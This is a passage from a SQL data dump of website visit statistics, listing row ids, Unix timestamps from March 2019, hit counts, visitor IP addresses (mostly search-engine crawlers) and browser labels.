,'46.229.168.130','other'),(398690,1552417107,1,1,0,0,'66.249.64.30','chrome'),(398691,1552417195,1,1,0,0,'66.249.64.58','chrome'),(398692,1552417214,2,2,0,0,'66.249.64.29','chrome'),(398693,1552417223,1,1,0,0,'54.36.150.26','other'),(398694,1552417228,1,1,0,0,'54.36.150.156','other'),(398695,1552417528,1,1,0,0,'46.229.168.144','other'),(398696,1552417838,1,1,0,0,'66.249.64.62','chrome'),(398697,1552418096,1,1,0,0,'207.46.13.56','other'),(398698,1552418507,1,1,0,0,'54.36.148.250','other'),(398699,1552418533,1,1,0,0,'54.36.149.35','other'),(398700,1552418594,1,1,0,0,'66.249.64.31','chrome'),(398701,1552418612,1,1,0,0,'54.36.149.46','other'),(398702,1552418640,1,1,0,0,'54.36.150.35','other'),(398703,1552419004,1,1,0,0,'46.211.148.116','other'),(398704,1552419045,1,1,0,0,'66.249.64.30','chrome'),(398705,1552419254,1,1,0,0,'95.163.255.102','other'),(398706,1552419339,1,1,0,0,'66.249.64.29','chrome'),(398707,1552419372,1,1,0,0,'54.36.148.95','other'),(398708,1552419430,1,1,0,0,'54.36.150.18','other'),(398709,1552419463,1,1,0,0,'46.229.168.148','other'),(398710,1552419480,1,1,0,0,'54.36.148.152','other'),(398711,1552419785,2,2,0,0,'207.46.13.74','other'),(398712,1552419903,1,1,0,0,'95.163.255.46','other'),(398713,1552419997,2,2,0,0,'66.249.64.31','chrome'),(398714,1552420189,1,1,0,0,'54.36.150.76','other'),(398715,1552421570,1,1,0,0,'66.249.64.31','chrome'),(398716,1552421580,1,1,0,0,'66.249.64.30','chrome'),(398717,1552421702,1,1,0,0,'8.29.198.26','other'),(398718,1552421755,1,1,0,0,'8.29.198.27','other'),(398719,1552421964,1,1,0,0,'54.36.148.170','other'),(398720,1552422602,1,1,0,0,'207.46.13.74','other'),(398721,1552422800,1,1,0,0,'54.36.148.113','other'),(398722,1552422837,1,1,0,0,'5.45.207.19','other'),(398723,1552423395,1,1,0,0,'54.36.150.163','other'),(398724,1552423431,1,1,0,0,'109.201.154.174','other'),(398725,1552423929,1,1,0,0,'94.180.155.27','msie'),(398726,1552423975,1,1,0,0,'91.207.61.35','firefox'),(398727,1552424603,1,1,0,0,'66.249.64.30','chrome'),(398728,1552424717,1,1,0,0,'40.77.167.38','other'),(398729,1552425173,1,1,0,0,'54.36.148.207','other'),(398730,1552425198,1,1,0,0,'54.36.148.130','other'),(398731,1552425207,1,1,0,0,'66.249.64.29','chrome'),(398732,1552425476,2,2,0,0,'66.249.64.31','chrome'),(398733,1552425631,1,1,0,0,'46.229.168.132','other'),(398734,1552425997,1,1,0,0,'54.36.148.170','other'),(398735,1552426526,1,1,0,0,'66.249.64.29','chrome'),(398736,1552426596,1,1,0,0,'46.229.168.148','other'),(398737,1552426781,1,1,0,0,'66.249.64.60','chrome'),(398738,1552426822,1,1,0,0,'54.36.148.211','other'),(398739,1552427309,1,1,0,0,'54.36.150.161','other'),(398740,1552427653,1,1,0,0,'180.76.15.18','other'),(398741,1552427669,1,1,0,0,'54.36.150.36','other'),(398742,1552427671,1,1,0,0,'54.36.149.32','other'),(398743,1552427707,1,1,0,0,'54.36.148.64','other'),(398744,1552427722,1,1,0,0,'46.229.168.152','other'),(398745,1552427770,1,1,0,0,'54.36.149.77','other'),(398746,1552427843,1,1,0,0,'46.229.168.129','other'),(398747,1552427948,2,2,0,0,'40.77.167.38','other'),(398748,1552428224,3,3,0,0,'5.45.207.79','other'),(398749,1552428247,1,1,0,0,'66.249.64.31','chrome'),(398750,1552428333,1,1,0,0,'37.9.113.148','other'),(398751,1552428337,2,2,0,0,'5.45.207.19','other'),(398752,1552428618,1,1,0,0,'54.36.148.49','other'),(398753,1552428715,1,1,0,0,'66.249.64.29','chrome'),(398754,1552428820,1,1,0,0,'54.36.148.9','other'),(398755,1552429193,1,1,0,0,'40.77.167.38','other'),(398756,1552429220,1,1,0,0,'66.249.64.60','chrome'),(398757,1552429469,1,1,0,0,'178.154.244.11','other'),(398758,1552429557,1,1,0,0,'54.36.148.129','other'),(398759,1552429628,1,1,0,0,'46.229.168.134','other'),(398760,1552429839,1,1,0,0,'46.229.168.152','other'),(398761,1552430071,2,2,0,0,'94.178.98.8','chrome'),(398762,1552430247,1,1,0,0,'66.249.64.30','chrome'),(398763,1552430397,1,1,0,0,'54.36.148.228','other'),(398764,1552431340,1,1,0,0,'54.36.148.217','other'),(398765,1552431361,1,1,0,0,'66.249.64.62','chrome'),(398766,1552431627,1,1,0,0,'54.36.150.124','other'),(398767,1552431766,1,1,0,0,'54.36.150.148','other'),(398768,1552432346,2,2,0,0,'46.229.168.147','other'),(398769,1552432569,1,1,0,0,'8.29.198.26','other'),(398770,1552432598,1,1,0,0,'54.36.150.4','other'),(398771,1552432606,1,1,0,0,'8.29.198.25','other'),(398772,1552432962,1,1,0,0,'157.55.39.173','other'),(398773,1552433059,1,1,0,0,'54.36.150.151','other'),(398774,1552433096,1,1,0,0,'178.154.244.11','other'),(398775,1552433532,1,1,0,0,'54.36.148.115','other'),(398776,1552433554,2,2,0,0,'46.229.168.133','other'),(398777,1552433760,1,1,0,0,'54.36.150.168','other'),(398778,1552434223,1,1,0,0,'216.244.66.241','other'),(398779,1552434322,1,1,0,0,'66.249.64.62','chrome'),(398780,1552434642,1,1,0,0,'66.249.64.31','chrome'),(398781,1552434746,1,1,0,0,'46.229.168.150','other'),(398782,1552434951,4,4,0,0,'5.45.207.19','other'),(398783,1552435097,2,2,0,0,'141.8.142.103','other'),(398784,1552435108,3,3,0,0,'178.154.244.11','other'),(398785,1552436113,1,1,0,0,'54.36.150.137','other'),(398786,1552436160,1,1,0,0,'5.45.207.79','other'),(398787,1552436294,1,1,0,0,'178.154.244.11','other'),(398788,1552436396,1,1,0,0,'54.36.148.175','other'),(398789,1552436414,1,1,0,0,'46.229.168.147','other'),(398790,1552436488,1,1,0,0,'54.36.149.65','other'),(398791,1552437084,1,1,0,0,'46.229.168.134','other'),(398792,1552437124,1,1,0,0,'54.36.149.78','other'),(398793,1552437236,1,1,0,0,'46.229.168.145','other'),(398794,1552437586,1,1,0,0,'54.36.150.5','other'),(398795,1552437674,1,1,0,0,'54.36.150.98','other'),(398796,1552438254,1,1,0,0,'66.249.64.30','chrome'),(398797,1552438350,1,1,0,0,'46.229.168.148','other'),(398798,1552438771,2,2,0,0,'40.77.167.84','other'),(398799,1552439114,1,1,0,0,'46.229.168.145','other'),(398800,1552439142,1,1,0,0,'54.36.148.191','other'),(398801,1552439169,1,1,0,0,'46.229.168.133','other'),(398802,1552439233,1,1,0,0,'54.36.150.106','other'),(398803,1552439434,1,1,0,0,'216.244.66.241','other'),(398804,1552439494,1,1,0,0,'54.36.150.40','other'),(398805,1552439812,1,1,0,0,'46.229.168.148','other'),(398806,1552439860,1,1,0,0,'54.36.149.73','other'),(398807,1552440127,1,1,0,0,'66.249.64.29','chrome'),(398808,1552440188,1,1,0,0,'54.36.150.104','other'),(398809,1552440536,1,1,0,0,'66.249.64.62','chrome'),(398810,1552441064,1,1,0,0,'207.46.13.74','other'),(398811,1552441688,1,1,0,0,'66.249.64.30','chrome'),(398812,1552441691,1,1,0,0,'54.36.148.120','other'),(398813,1552441782,1,1,0,0,'54.36.150.39','other'),(398814,1552441865,1,1,0,0,'66.249.64.58','chrome'),(398815,1552441895,1,1,0,0,'216.244.66.241','other'),(398816,1552442610,1,1,0,0,'54.36.150.65','other'),(398817,1552442616,1,1,0,0,'54.36.148.129','other'),(398818,1552442710,1,1,0,0,'54.36.148.23','other'),(398819,1552442713,1,1,0,0,'193.203.50.29','firefox'),(398820,1552443414,1,1,0,0,'8.29.198.26','other'),(398821,1552443442,1,1,0,0,'5.45.207.19','other'),(398822,1552443444,1,1,0,0,'5.45.207.79','other'),(398823,1552443453,1,1,0,0,'8.29.198.25','other'),(398824,1552443795,1,1,0,0,'54.36.148.247','other'),(398825,1552444069,1,1,0,0,'54.36.150.153','other'),(398826,1552444165,2,2,0,0,'40.77.167.84','other'),(398827,1552444282,1,1,0,0,'207.46.13.74','other'),(398828,1552444299,1,1,0,0,'54.36.148.184','other'),(398829,1552444342,1,1,0,0,'54.36.150.20','other'),(398830,1552444876,1,1,0,0,'66.249.64.29','chrome'),(398831,1552444937,1,1,0,0,'66.249.64.31','chrome'),(398832,1552445024,1,1,0,0,'46.229.168.148','other'),(398833,1552445537,1,1,0,0,'46.229.168.136','other'),(398834,1552445572,1,1,0,0,'66.249.64.62','chrome'),(398835,1552446161,1,1,0,0,'54.36.150.167','other'),(398836,1552446507,1,1,0,0,'66.249.64.31','chrome'),(398837,1552446548,1,1,0,0,'46.229.168.149','other'),(398838,1552446727,1,1,0,0,'207.46.13.55','other'),(398839,1552446979,1,1,0,0,'209.17.97.50','other'),(398840,1552447049,1,1,0,0,'46.229.168.151','other'),(398841,1552447162,1,1,0,0,'87.250.224.47','other'),(398842,1552447235,1,1,0,0,'37.9.113.20','other'),(398843,1552447261,1,1,0,0,'54.36.148.89','other'),(398844,1552447270,3,3,0,0,'5.45.207.19','other'),(398845,1552447536,1,1,0,0,'13.66.139.0','other'),(398846,1552447589,1,1,0,0,'141.8.142.103','other'),(398847,1552447666,1,1,0,0,'66.249.64.58','chrome'),(398848,1552447721,1,1,0,0,'207.46.13.121','other'),(398849,1552447838,1,1,0,0,'178.154.244.11','other'),(398850,1552447949,1,1,0,0,'54.36.148.53','other'),(398851,1552447950,1,1,0,0,'141.8.142.108','other'),(398852,1552447976,1,1,0,0,'5.45.207.79','other'),(398853,1552448013,1,1,0,0,'66.249.64.60','chrome'),(398854,1552448294,2,2,0,0,'5.9.88.113','other'),(398855,1552448553,1,1,0,0,'54.36.148.38','other'),(398856,1552448587,1,1,0,0,'66.249.64.30','chrome'),(398857,1552448613,1,1,0,0,'54.36.148.11','other'),(398858,1552448669,1,1,0,0,'46.229.168.142','other'),(398859,1552448795,1,1,0,0,'54.36.150.190','other'),(398860,1552448983,1,1,0,0,'40.77.167.84','other'),(398861,1552449594,2,2,0,0,'216.244.66.241','other'),(398862,1552449855,291,291,0,0,'144.76.6.230','other'),(398863,1552450092,18,18,0,0,'78.46.85.236','other'),(398864,1552450264,1,1,0,0,'54.36.150.116','other'),(398865,1552450303,1,1,0,0,'54.36.148.200','other'),(398866,1552451024,1,1,0,0,'54.36.150.130','other'),(398867,1552451701,2,2,0,0,'46.229.168.130','other'),(398868,1552451743,1,1,0,0,'54.36.148.17','other'),(398869,1552451774,1,1,0,0,'54.36.148.147','other'),(398870,1552451975,1,1,0,0,'54.36.150.172','other'),(398871,1552452006,1,1,0,0,'207.46.13.54','other'),(398872,1552452367,1,1,0,0,'46.229.168.136','other'),(398873,1552452704,1,1,0,0,'46.229.168.144','other'),(398874,1552452745,1,1,0,0,'216.244.66.241','other'),(398875,1552452775,1,1,0,0,'54.36.149.3','other'),(398876,1552453118,1,1,0,0,'5.45.207.19','other'),(398877,1552453147,1,1,0,0,'54.36.149.101','other'),(398878,1552453159,1,1,0,0,'37.9.113.103','other'),(398879,1552453178,1,1,0,0,'54.36.150.34','other'),(398880,1552453224,1,1,0,0,'95.108.213.4','other'),(398881,1552453234,2,2,0,0,'141.8.142.103','other'),(398882,1552453277,1,1,0,0,'87.250.224.47','other'),(398883,1552453313,1,1,0,0,'54.36.148.102','other'),(398884,1552453514,1,1,0,0,'40.77.167.84','other'),(398885,1552453981,1,1,0,0,'54.36.150.44','other'),(398886,1552453987,1,1,0,0,'54.36.148.144','other'),(398887,1552454261,1,1,0,0,'8.29.198.26','other'),(398888,1552454302,1,1,0,0,'8.29.198.27','other'),(398889,1552454306,1,1,0,0,'66.249.64.60','chrome'),(398890,1552454642,1,1,0,0,'54.36.149.44','other'),(398891,1552454709,1,1,0,0,'46.229.168.148','other'),(398892,1552455350,2,2,0,0,'34.222.240.97','chrome'),(398893,1552455744,1,1,0,0,'54.36.150.24','other'),(398894,1552456086,1,1,0,0,'95.163.255.47','other'),(398895,1552456280,1,1,0,0,'54.36.150.121','other'),(398896,1552456354,1,1,0,0,'66.249.64.60','chrome'),(398897,1552456357,1,1,0,0,'54.36.150.134','other'),(398898,1552456373,1,1,0,0,'40.77.167.84','other'),(398899,1552456437,1,1,0,0,'46.229.168.139','other'),(398900,1552457520,1,1,0,0,'54.36.148.99','other'),(398901,1552457667,1,1,0,0,'54.36.148.211','other'),(398902,1552457701,1,1,0,0,'13.57.233.99','chrome'),(398903,1552457736,1,1,0,0,'95.163.255.45','other'),(398904,1552457759,1,1,0,0,'54.36.149.107','other'),(398905,1552457782,1,1,0,0,'194.44.97.252','other'),(398906,1552458012,1,1,0,0,'54.36.150.164','other'),(398907,1552458123,1,1,0,0,'54.36.148.14','other'),(398908,1552458458,1,1,0,0,'178.154.244.11','other'),(398909,1552458465,1,1,0,0,'141.8.142.103','other'),(398910,1552458477,2,2,0,0,'66.249.64.31','chrome'),(398911,1552458636,1,1,0,0,'185.220.101.53','other'),(398912,1552458759,1,1,0,0,'46.229.168.143','other'),(398913,1552458917,2,2,0,0,'66.249.64.62','chrome'),(398914,1552458941,1,1,0,0,'46.229.168.140','other'),(398915,1552459065,1,1,0,0,'54.36.148.99','other'),(398916,1552459103,1,1,0,0,'5.45.207.19','other'),(398917,1552459134,1,1,0,0,'54.36.149.40','other'),(398918,1552459476,1,1,0,0,'207.46.13.55','other'),(398919,1552459521,1,1,0,0,'54.36.148.58','other'),(398920,1552460227,29,29,0,0,'5.9.71.213','other'),(398921,1552460287,1,1,0,0,'54.36.149.20','other'),(398922,1552460698,1,1,0,0,'77.37.243.189','msie'),(398923,1552460747,1,1,0,0,'54.36.148.82','other'),(398924,1552460921,1,1,0,0,'54.36.148.226','other'),(398925,1552461099,1,1,0,0,'54.36.148.16','other'),(398926,1552461154,1,1,0,0,'54.36.148.184','other'),(398927,1552461329,1,1,0,0,'54.36.150.3','other'),(398928,1552461353,2,2,0,0,'195.10.210.70','chrome'),(398929,1552461436,1,1,0,0,'207.46.13.66','other'),(398930,1552461575,1,1,0,0,'91.196.178.168','chrome'),(398931,1552461783,1,1,0,0,'54.36.148.240','other'),(398932,1552461953,1,1,0,0,'54.36.148.238','other'),(398933,1552461989,1,1,0,0,'46.229.168.140','other'),(398934,1552462023,1,1,0,0,'207.46.13.121','other'),(398935,1552462282,1,1,0,0,'54.36.148.93','other'),(398936,1552462838,1,1,0,0,'46.211.65.61','other'),(398937,1552462938,1,1,0,0,'66.249.64.30','chrome'),(398938,1552463234,1,1,0,0,'54.36.148.226','other'),(398939,1552463344,1,1,0,0,'54.36.149.27','other'),(398940,1552463792,1,1,0,0,'54.36.148.14','other'),(398941,1552463965,1,1,0,0,'178.154.171.24','other'),(398942,1552463977,1,1,0,0,'178.154.244.49','other'),(398943,1552464197,1,1,0,0,'46.229.168.139','other'),(398944,1552464335,1,1,0,0,'37.9.113.148','other'),(398945,1552464382,1,1,0,0,'141.8.142.103','other'),(398946,1552464412,1,1,0,0,'207.46.13.121','other'),(398947,1552464475,1,1,0,0,'54.36.150.16','other'),(398948,1552464541,1,1,0,0,'46.229.168.147','other'),(398949,1552464626,1,1,0,0,'46.211.65.61','other'),(398950,1552464672,1,1,0,0,'91.196.178.190','chrome'),(398951,1552464739,1,1,0,0,'54.36.149.45','other'),(398952,1552465113,2,2,0,0,'8.29.198.27','other'),(398953,1552465454,1,1,0,0,'91.196.177.46','firefox'),(398954,1552465478,1,1,0,0,'54.36.148.232','other'),(398955,1552465678,1,1,0,0,'54.36.150.61','other'),(398956,1552465925,1,0,1,0,'66.249.64.31',''),(398957,1552465957,1,1,0,0,'95.135.240.181','chrome'),(398958,1552466223,1,1,0,0,'54.36.148.28','other'),(398959,1552466309,1,1,0,0,'91.196.177.46','chrome'),(398960,1552466720,1,1,0,0,'54.36.148.254','other'),(398961,1552466850,1,1,0,0,'46.229.168.129','other'),(398962,1552466911,1,1,0,0,'46.211.109.43','other'),(398963,1552466947,1,1,0,0,'46.211.133.117','other'),(398964,1552467161,1,1,0,0,'54.36.149.35','other'),(398965,1552467204,1,1,0,0,'66.249.64.31','chrome'),(398966,1552467464,1,1,0,0,'54.36.148.137','other'),(398967,1552467577,1,1,0,0,'54.36.148.174','other'),(398968,1552467871,1,1,0,0,'46.211.133.117','other'),(398969,1552468388,1,1,0,0,'54.36.149.55','other'),(398970,1552468577,1,1,0,0,'54.36.148.228','other'),(398971,1552468652,1,1,0,0,'5.45.207.19','other'),(398972,1552468837,2,2,0,0,'95.132.22.158','chrome'),(398973,1552469146,1,1,0,0,'46.229.168.130','other'),(398974,1552469318,1,1,0,0,'54.36.150.155','other'),(398975,1552469350,1,1,0,0,'54.36.150.106','other'),(398976,1552469365,1,1,0,0,'54.36.148.79','other'),(398977,1552469504,1,1,0,0,'54.36.149.39','other'),(398978,1552469705,1,1,0,0,'54.36.150.191','other'),(398979,1552469737,1,1,0,0,'66.249.64.30','chrome'),(398980,1552469915,1,1,0,0,'66.249.64.31','chrome'),(398981,1552469924,1,1,0,0,'66.249.64.60','chrome'),(398982,1552469938,1,1,0,0,'66.249.64.29','chrome'),(398983,1552469980,1,1,0,0,'54.36.150.119','other'),(398984,1552470092,1,1,0,0,'54.36.148.202','other'),(398985,1552470185,1,1,0,0,'95.108.213.4','other'),(398986,1552470192,1,1,0,0,'54.36.150.162','other'),(398987,1552470409,2,2,0,0,'5.45.207.19','other'),(398988,1552470737,1,1,0,0,'54.36.148.247','other'),(398989,1552470907,1,1,0,0,'54.36.148.140','other'),(398990,1552471240,2,2,0,0,'91.196.178.8','chrome'),(398991,1552471343,1,1,0,0,'95.108.213.4','other'),(398992,1552471849,2,2,0,0,'95.213.141.126','opera'),(398993,1552471863,1,1,0,0,'46.229.168.134','other'),(398994,1552471926,1,1,0,0,'66.249.64.31','chrome'),(398995,1552472019,1,1,0,0,'54.36.148.38','other'),(398996,1552472355,1,1,0,0,'54.36.148.194','other'),(398997,1552472532,1,1,0,0,'54.36.148.250','other'),(398998,1552473097,1,1,0,0,'54.36.150.52','other'),(398999,1552473323,1,1,0,0,'54.36.150.28','other'),(399000,1552473403,1,1,0,0,'40.77.167.84','other'),(399001,1552473856,1,1,0,0,'54.36.149.45','other'),(399002,1552474007,1,1,0,0,'46.229.168.132','other'),(399003,1552474179,1,1,0,0,'46.229.168.142','other'),(399004,1552474278,1,1,0,0,'54.36.150.2','other'),(399005,1552474287,1,1,0,0,'46.174.125.28','chrome'),(399006,1552474374,1,1,0,0,'54.36.150.124','other'),(399007,1552474610,1,1,0,0,'66.249.64.30','chrome'),(399008,1552474900,1,1,0,0,'54.36.148.167','other'),(399009,1552475269,2,2,0,0,'207.46.13.121','other'),(399010,1552475569,1,1,0,0,'54.36.150.11','other'),(399011,1552475615,1,1,0,0,'54.36.150.76','other'),(399012,1552475736,1,1,0,0,'54.36.148.224','other'),(399013,1552475953,1,1,0,0,'8.29.198.27','other'),(399014,1552475998,1,1,0,0,'8.29.198.26','other'),(399015,1552476134,1,1,0,0,'216.244.66.241','other'),(399016,1552476688,1,1,0,0,'54.36.150.178','other'),(399017,1552476874,1,1,0,0,'92.113.16.249','chrome'),(399018,1552477151,1,1,0,0,'54.36.150.64','other'),(399019,1552477433,1,1,0,0,'54.36.150.95','other'),(399020,1552477666,1,1,0,0,'46.229.168.133','other'),(399021,1552477902,1,1,0,0,'66.249.64.29','chrome'),(399022,1552478176,1,1,0,0,'54.36.148.117','other'),(399023,1552478857,1,1,0,0,'66.249.64.29','chrome'),(399024,1552479335,1,1,0,0,'54.36.148.215','other'),(399025,1552479431,1,1,0,0,'54.36.148.154','other'),(399026,1552479653,1,1,0,0,'54.36.148.135','other'),(399027,1552479714,1,1,0,0,'54.36.150.46','other'),(399028,1552479718,1,1,0,0,'66.249.64.31','chrome'),(399029,1552479800,1,1,0,0,'54.36.149.98','other'),(399030,1552479995,1,1,0,0,'54.36.150.104','other'),(399031,1552480278,1,1,0,0,'54.36.148.105','other'),(399032,1552480498,1,1,0,0,'5.196.87.174','other'),(399033,1552480707,1,1,0,0,'54.36.150.93','other'),(399034,1552480835,1,1,0,0,'54.36.148.38','other'),(399035,1552480901,1,1,0,0,'54.36.150.41','other'),(399036,1552480913,1,1,0,0,'193.107.75.91','other'),(399037,1552480955,1,1,0,0,'54.36.148.42','other'),(399038,1552481001,1,1,0,0,'54.36.148.93','other'),(399039,1552481010,1,1,0,0,'46.229.168.146','other'),(399040,1552481209,1,1,0,0,'54.36.150.105','other'),(399041,1552481270,1,1,0,0,'54.36.150.134','other'),(399042,1552481327,1,1,0,0,'54.36.150.28','other'),(399043,1552481573,1,1,0,0,'54.36.149.21','other'),(399044,1552481643,1,1,0,0,'216.244.66.241','other'),(399045,1552481717,1,1,0,0,'66.249.64.60','chrome'),(399046,1552481971,1,1,0,0,'66.249.64.29','chrome'),(399047,1552482251,1,1,0,0,'46.229.168.144','other'),(399048,1552482419,1,1,0,0,'66.249.64.62','chrome'),(399049,1552482727,1,1,0,0,'66.249.64.30','chrome'),(399050,1552483191,1,1,0,0,'54.36.150.49','other'),(399051,1552483360,1,1,0,0,'91.124.107.252','chrome'),(399052,1552483555,1,1,0,0,'54.36.148.216','other'),(399053,1552483580,1,1,0,0,'180.76.15.33','other'),(399054,1552483653,1,1,0,0,'54.36.150.112','other'),(399055,1552483927,1,1,0,0,'46.229.168.137','other'),(399056,1552484198,1,1,0,0,'178.92.211.229','chrome'),(399057,1552484372,1,1,0,0,'87.250.224.81','other'),(399058,1552484524,1,1,0,0,'54.36.149.100','other'),(399059,1552484606,1,1,0,0,'95.108.213.4','other'),(399060,1552484756,1,1,0,0,'54.36.148.138','other'),(399061,1552484822,1,1,0,0,'87.250.224.47','other'),(399062,1552484964,1,1,0,0,'178.154.244.11','other'),(399063,1552484973,1,1,0,0,'54.36.150.18','other'),(399064,1552485200,1,1,0,0,'46.229.168.129','other'),(399065,1552485337,2,2,0,0,'195.34.204.153','chrome'),(399066,1552485426,1,1,0,0,'54.36.149.51','other'),(399067,1552485471,1,1,0,0,'207.46.13.75','other'),(399068,1552485654,1,1,0,0,'91.196.178.178','chrome'),(399069,1552485831,1,1,0,0,'54.36.150.82','other'),(399070,1552485944,1,1,0,0,'54.36.148.177','other'),(399071,1552485987,1,1,0,0,'66.249.64.29','chrome'),(399072,1552486628,1,1,0,0,'91.196.178.99','chrome'),(399073,1552486752,1,1,0,0,'46.200.188.151','chrome'),(399074,1552486816,1,1,0,0,'8.29.198.27','other'),(399075,1552486840,1,1,0,0,'8.29.198.26','other'),(399076,1552486852,1,1,0,0,'54.36.148.130','other'),(399077,1552487060,1,1,0,0,'54.36.150.163','other'),(399078,1552487182,1,1,0,0,'54.36.150.164','other'),(399079,1552487390,1,1,0,0,'46.229.168.150','other'),(399080,1552487622,1,1,0,0,'66.249.64.31','chrome'),(399081,1552487800,1,1,0,0,'46.229.168.147','other'),(399082,1552487841,1,1,0,0,'54.36.148.88','other'),(399083,1552488186,1,1,0,0,'46.211.89.177','chrome'),(399084,1552488404,1,1,0,0,'37.53.225.213','opera'),(399085,1552488435,1,1,0,0,'54.36.148.216','other'),(399086,1552488507,1,1,0,0,'209.17.96.250','other'),(399087,1552488974,1,1,0,0,'207.46.13.121','other'),(399088,1552489144,1,1,0,0,'92.113.16.249','chrome'),(399089,1552489823,1,1,0,0,'54.36.148.186','other'),(399090,1552490296,1,1,0,0,'46.229.168.135','other'),(399091,1552490382,1,1,0,0,'66.249.64.30','chrome'),(399092,1552490856,1,1,0,0,'91.196.178.93','firefox'),(399093,1552490983,1,1,0,0,'46.229.168.141','other'),(399094,1552491043,1,1,0,0,'91.196.178.48','chrome'),(399095,1552491044,1,1,0,0,'54.36.148.119','other'),(399096,1552491220,1,1,0,0,'207.46.13.75','other'),(399097,1552491255,1,1,0,0,'54.36.149.9','other'),(399098,1552491279,1,1,0,0,'66.249.64.29','chrome'),(399099,1552491391,5,5,0,0,'5.45.207.19','other'),(399100,1552491569,2,2,0,0,'178.154.244.11','other'),(399101,1552491604,1,1,0,0,'87.250.224.47','other'),(399102,1552491606,1,1,0,0,'46.229.168.144','other'),(399103,1552491850,1,1,0,0,'141.8.142.103','other'),(399104,1552491896,1,1,0,0,'37.53.225.72','chrome'),(399105,1552491976,1,1,0,0,'5.45.207.79','other'),(399106,1552492373,3,3,0,0,'216.244.66.241','other'),(399107,1552492618,1,1,0,0,'54.36.148.25','other'),(399108,1552492658,1,1,0,0,'207.46.13.25','other'),(399109,1552493061,1,1,0,0,'54.36.149.75','other'),(399110,1552493110,1,1,0,0,'54.36.148.124','other'),(399111,1552493205,1,1,0,0,'54.36.148.252','other'),(399112,1552493536,1,1,0,0,'46.229.168.133','other'),(399113,1552493947,1,1,0,0,'54.36.148.48','other'),(399114,1552493992,1,1,0,0,'66.249.64.31','chrome'),(399115,1552494104,1,1,0,0,'207.46.13.75','other'),(399116,1552494340,1,1,0,0,'46.229.168.138','other'),(399117,1552494342,1,1,0,0,'91.196.178.134','chrome'),(399118,1552494438,1,1,0,0,'54.36.150.153','other'),(399119,1552494468,1,0,1,0,'66.249.64.30',''),(399120,1552495003,1,1,0,0,'46.229.168.130','other'),(399121,1552495030,2,2,0,0,'66.249.64.30','chrome'),(399122,1552495099,1,1,0,0,'54.36.148.160','other'),(399123,1552495191,1,1,0,0,'54.36.150.47','other'),(399124,1552495401,1,1,0,0,'54.36.148.189','other'),(399125,1552495436,1,1,0,0,'37.55.2.191','chrome'),(399126,1552495463,1,1,0,0,'91.196.178.54','chrome'),(399127,1552495471,1,1,0,0,'66.249.64.29','chrome'),(399128,1552495483,1,1,0,0,'42.236.10.114','chrome'),(399129,1552495517,1,1,0,0,'180.163.220.66','other'),(399130,1552495543,1,1,0,0,'59.188.255.197','other'),(399131,1552495761,1,1,0,0,'54.36.150.148','other'),(399132,1552495789,3,3,0,0,'207.46.13.75','other'),(399133,1552495879,1,1,0,0,'54.36.149.107','other'),(399134,1552495981,1,1,0,0,'40.77.167.84','other'),(399135,1552496212,1,1,0,0,'54.36.149.49','other'),(399136,1552496607,1,1,0,0,'141.8.142.103','other'),(399137,1552497056,1,1,0,0,'54.36.148.100','other'),(399138,1552497154,1,1,0,0,'46.229.168.132','other'),(399139,1552497184,1,1,0,0,'91.196.178.54','chrome'),(399140,1552497348,1,1,0,0,'54.36.149.86','other'),(399141,1552497656,2,2,0,0,'8.29.198.27','other'),(399142,1552497666,1,1,0,0,'54.36.150.166','other'),(399143,1552498057,1,1,0,0,'54.36.148.13','other'),(399144,1552498121,1,1,0,0,'54.36.148.195','other'),(399145,1552498219,1,1,0,0,'66.249.64.31','chrome'),(399146,1552498312,1,1,0,0,'207.46.13.75','other'),(399147,1552498316,1,1,0,0,'54.36.149.50','other'),(399148,1552498535,4,4,0,0,'178.154.244.11','other'),(399149,1552498656,1,1,0,0,'141.8.142.103','other'),(399150,1552498973,1,1,0,0,'37.115.186.35','chrome'),(399151,1552498990,1,1,0,0,'5.45.207.19','other'),(399152,1552499534,2,2,0,0,'178.154.244.11','other'),(399153,1552499572,1,1,0,0,'46.229.168.148','other'),(399154,1552499637,1,1,0,0,'54.36.149.76','other'),(399155,1552499883,1,1,0,0,'54.36.148.188','other'),(399156,1552500162,1,1,0,0,'54.36.150.137','other'),(399157,1552500181,1,1,0,0,'54.36.150.134','other'),(399158,1552500398,1,1,0,0,'46.229.168.138','other'),(399159,1552500715,1,1,0,0,'46.229.168.133','other'),(399160,1552500735,1,1,0,0,'54.36.149.96','other'),(399161,1552500983,1,1,0,0,'207.46.13.121','other'),(399162,1552501069,1,1,0,0,'54.36.150.54','other'),(399163,1552501332,1,1,0,0,'157.55.39.230','other'),(399164,1552501541,1,1,0,0,'46.229.168.134','other'),(399165,1552501703,1,1,0,0,'46.229.168.147','other'),(399166,1552501762,1,1,0,0,'37.115.186.35','chrome'),(399167,1552501917,1,1,0,0,'54.36.148.171','other'),(399168,1552502352,1,1,0,0,'66.249.64.29','chrome'),(399169,1552502417,1,1,0,0,'66.249.64.58','chrome'),(399170,1552503336,1,1,0,0,'54.36.150.91','other'),(399171,1552503459,1,1,0,0,'207.46.13.61','other'),(399172,1552503487,1,1,0,0,'54.36.149.41','other'),(399173,1552503963,1,1,0,0,'54.36.148.172','other'),(399174,1552504090,1,1,0,0,'54.36.148.73','other'),(399175,1552504301,1,1,0,0,'54.36.148.189','other'),(399176,1552504349,1,1,0,0,'46.229.168.139','other'),(399177,1552504933,1,1,0,0,'54.36.148.94','other'),(399178,1552505234,1,1,0,0,'216.244.66.241','other'),(399179,1552505316,1,1,0,0,'37.9.113.148','other'),(399180,1552505449,1,1,0,0,'95.163.255.109','other'),(399181,1552505478,1,1,0,0,'54.36.148.215','other'),(399182,1552505812,1,1,0,0,'54.36.150.99','other'),(399183,1552505960,1,1,0,0,'40.77.167.88','other'),(399184,1552505996,1,1,0,0,'54.36.148.247','other'),(399185,1552506042,1,1,0,0,'54.36.150.173','other'),(399186,1552506068,1,1,0,0,'157.55.39.230','other'),(399187,1552506150,2,2,0,0,'178.154.244.11','other'),(399188,1552506213,3,3,0,0,'5.45.207.79','other'),(399189,1552506273,1,1,0,0,'5.45.207.19','other'),(399190,1552507086,5,5,0,0,'207.46.13.75','other'),(399191,1552507093,5,5,0,0,'207.46.13.61','other'),(399192,1552507099,2,2,0,0,'40.77.167.88','other'),(399193,1552507107,5,5,0,0,'157.55.39.230','other'),(399194,1552507203,1,1,0,0,'5.45.207.19','other'),(399195,1552507568,1,1,0,0,'91.196.178.84','firefox'),(399196,1552507889,1,1,0,0,'91.196.178.48','chrome'),(399197,1552507935,1,1,0,0,'141.8.142.103','other'),(399198,1552508420,1,1,0,0,'54.36.150.4','other'),(399199,1552508519,1,1,0,0,'8.29.198.26','other')